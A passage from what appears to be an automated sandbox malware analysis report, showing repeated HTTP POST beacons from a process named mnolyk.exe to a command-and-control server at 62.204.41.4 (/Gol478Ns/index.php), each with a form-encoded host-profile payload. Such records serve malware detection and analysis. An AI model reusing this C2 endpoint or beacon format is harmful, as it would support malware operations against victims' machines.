                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.625554085 CET | 262 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            74 | 192.168.2.4 | 49769 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:44.792124987 CET | 262 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:44.854747057 CET | 263 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:44 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            75 | 192.168.2.4 | 49770 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:45.036009073 CET | 264 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.101557016 CET | 264 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            76 | 192.168.2.4 | 49771 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:45.279320002 CET | 265 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.342809916 CET | 265 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            77 | 192.168.2.4 | 49772 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:45.513154030 CET | 266 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.578795910 CET | 266 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            78 | 192.168.2.4 | 49773 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:45.744565964 CET | 267 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:45.808087111 CET | 267 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:45 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            79 | 192.168.2.4 | 49774 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:45.979161978 CET | 267 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.045454025 CET | 268 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            8 | 192.168.2.4 | 49703 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:26.386152029 CET | 197 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.450826883 CET | 197 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            80 | 192.168.2.4 | 49775 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:46.222862005 CET | 268 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.288197994 CET | 269 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            81 | 192.168.2.4 | 49776 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:46.462656021 CET | 269 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.525080919 CET | 270 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            82 | 192.168.2.4 | 49777 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:46.698035002 CET | 270 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.761801958 CET | 271 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            83 | 192.168.2.4 | 49778 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:46.936136961 CET | 271 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:46.998788118 CET | 272 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:46 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            84 | 192.168.2.4 | 49779 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:47.176230907 CET | 272 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.242113113 CET | 273 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            85 | 192.168.2.4 | 49780 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:47.419949055 CET | 273 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.485343933 CET | 274 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            86 | 192.168.2.4 | 49781 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:47.651799917 CET | 274 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.717269897 CET | 275 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            87 | 192.168.2.4 | 49782 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:47.887595892 CET | 275 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:47.952157974 CET | 276 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:47 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            88 | 192.168.2.4 | 49783 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:48.137742043 CET | 276 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.203149080 CET | 277 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            89 | 192.168.2.4 | 49784 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:48.372469902 CET | 277 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.437582016 CET | 278 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            9 | 192.168.2.4 | 49704 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:26.622936010 CET | 198 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.686882019 CET | 198 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            90 | 192.168.2.4 | 49785 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:48.607664108 CET | 278 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:48.672290087 CET | 279 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:48 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            91 | 192.168.2.4 | 49786 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:48.848860979 CET | 279 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
